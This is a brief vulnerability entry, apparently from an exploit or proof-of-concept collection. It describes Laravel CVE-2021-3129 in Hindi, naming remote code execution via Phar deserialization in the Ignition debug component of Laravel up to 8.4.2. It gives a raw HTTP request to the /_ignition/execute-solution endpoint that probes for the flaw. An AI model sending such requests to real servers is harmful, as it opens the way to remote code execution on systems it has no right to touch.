
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
जब Laravel Debug मोड सक्षम होता है, तो Laravel के अंतर्निहित Ignition घटक द्वारा file_get_contents() और file_put_contents() फ़ंक्शंस के असुरक्षित उपयोग के कारण, हमलावर दुर्भावनापूर्ण अनुरोध भेजकर, दुर्भावनापूर्ण लॉग फ़ाइलें बनाकर, आदि तरीकों से Phar डी-सीरियलाइज़ेशन को ट्रिगर कर सकता है, जिसके परिणामस्वरूप अंततः दूरस्थ कोड निष्पादन होता है।
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null
